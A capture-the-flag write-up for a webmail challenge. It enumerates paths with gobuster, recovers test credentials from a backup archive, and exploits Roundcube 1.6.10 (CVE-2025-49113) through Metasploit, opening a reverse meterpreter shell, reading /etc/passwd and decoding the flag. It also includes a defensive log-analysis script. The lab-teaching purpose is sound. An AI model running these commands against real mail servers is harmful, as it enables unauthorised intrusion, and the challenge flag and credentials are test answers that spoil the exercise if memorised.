Temporary Webmail


🧠 Challenge Text

Hi, emergency troubleshooter,

the e-mail administrator, Bob, was tasked with hastily setting up a new webmail server for temporary access to old e-mails. Verify whether the server is properly secured (you know how it usually goes with temporary services).

Stay grounded!

Webmail runs on server webmail.powergrid.tcc.

🔍 Hints Text

1. Hint IT department is known for using disposable test accounts ADM40090, ADM40091, ADM40092 up to ADM40099.

🎨 Solution

Let's enumerate the webmail URL paths using the gobuster tool and a directory wordlist.

$ gobuster dir -u http://webmail.powergrid.tcc -w ~/directory-list-lowercase-2.3-medium.txt

...
/backup               (Status: 301) [Size: 331] [--> http://webmail.powergrid.tcc/backup/]
...

An interesting /backup endpoint contains an archive that can be downloaded locally. From the hint we can find the user ADM40092 and the password WELCOME6.
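Seen from the server side, the enumeration above leaves a recognisable trace in the web access log. The following is an added example, not part of the original write-up: it flags clients that request many distinct non-existent paths and lists the paths that did answer, such as /backup. The combined log format, the thresholds, the client addresses and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" format is assumed: ip, ident, user, [time], "request", status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_enumeration(lines, min_misses=20, miss_ratio=0.8):
    """Return {client_ip: [(path, status), ...]} for clients whose traffic looks
    like wordlist enumeration, listing the paths that actually existed."""
    misses = defaultdict(set)   # ip -> distinct paths answered with 404
    hits = defaultdict(list)    # ip -> (path, status) answered with 2xx/3xx
    total = defaultdict(int)    # ip -> number of parsed requests
    for raw in lines:
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip malformed lines instead of failing the whole run
        ip, path, status = m["ip"], m["path"], int(m["status"])
        total[ip] += 1
        if status == 404:
            misses[ip].add(path)
        elif 200 <= status < 400 and (path, status) not in hits[ip]:
            hits[ip].append((path, status))
    findings = {}
    for ip, missed in misses.items():
        # Many distinct misses that also dominate the client's traffic.
        if len(missed) >= min_misses and len(missed) / total[ip] >= miss_ratio:
            findings[ip] = hits[ip]
    return findings

def sample_log():
    """Constructed log lines: one scanning client and one ordinary user."""
    def line(ip, path, status):
        return (f'{ip} - - [01/Jan/2025:10:00:00 +0000] '
                f'"GET {path} HTTP/1.1" {status} 331 "-" "-"')
    scan = [line("198.51.100.7", f"/word{i}", 404) for i in range(40)]
    scan.insert(25, line("198.51.100.7", "/backup", 301))
    scan.append(line("198.51.100.7", "/backup/", 200))
    user = [line("192.0.2.50", "/", 200), line("192.0.2.50", "/favicon.ico", 404)]
    return scan + user

if __name__ == "__main__":
    for ip, found in find_enumeration(sample_log()).items():
        print(ip, "enumerated paths and found:", found)
```

Any path reported for a flagged client is worth reviewing for content that should not be reachable over HTTP, as the backup archive was here.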

Logged In

In the webmail portal, the important detail is the Roundcube version: Roundcube Webmail 1.6.10.

Metasploit

I used Metasploit, as other options such as fearsoff with a reverse TCP shell did not work.

Run msf console

$ msfconsole

Select the correct exploit module and list its available options

msf > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > options

Set all the parameters for our task

msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME ADM40092
USERNAME => ADM40092
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD WELCOME6
PASSWORD => WELCOME6
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST 10.200.0.11
LHOST => 10.200.0.11
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set HOST webmail.powergrid.tcc
HOST => webmail.powergrid.tcc
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOST webmail.powergrid.tcc
RHOST => webmail.powergrid.tcc
msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > run -j

msf exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > sessions -i 1

Logged in Session

Inside the session, read the contents of the passwd file

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MariaDB Server,,,:/nonexistent:/bin/false
dovecot:x:102:103:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:103:104:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
postfix:x:104:105::/var/spool/postfix:/usr/sbin/nologin
flag:x:65535:65535:RkxBR3tXbThuLXQ1cWUteEhueS1nNEdPfQ==:/nonexistent:/usr/sbin/nologin
adm40092:x:1001:1001::/home/adm40092:/bin/sh

Finally, take the base64 string from the flag user's entry and decode it

$ echo RkxBR3tXbThuLXQ1cWUteEhueS1nNEdPfQ== | base64 -d
FLAG{Wm8n-t5qe-xHny-g4GO}